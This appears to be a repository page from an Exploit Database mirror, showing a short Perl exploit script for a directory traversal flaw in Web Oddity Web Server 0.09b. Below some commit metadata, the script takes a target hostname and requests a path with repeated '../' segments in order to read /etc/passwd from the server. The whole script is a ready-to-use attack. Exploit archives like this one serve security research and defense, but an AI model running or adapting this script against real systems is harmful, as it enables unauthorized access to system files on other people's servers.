exploit-db-mirror/exploits/linux/remote/4362.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
692 B
Perl
Executable file

# Web Oddity Web Server 0.09b Directory Transversal Vulnerability
# Found by: Katatafish (karatatata@hush.com)
# Download: http://sourceforge.net/project/showfiles.php?group_id=13854
# Thanks: str0ke
use LWP::Simple;
use strict;
sub usage
{
print "----------------------------------------------------- - -----------\n";
print "Web Oddity Web Server 0.09b Directory Transversal Vulnerability\n";
print "\n";
print "usage: $0 www.site.com\n";
print "------------------------------------------------- Katatafish-----\n";
exit ();
}
my $host=shift || &usage;
getprint 'http://' . $host . '/../../../../../../../etc/passwd';
# milw0rm.com [2007-09-04]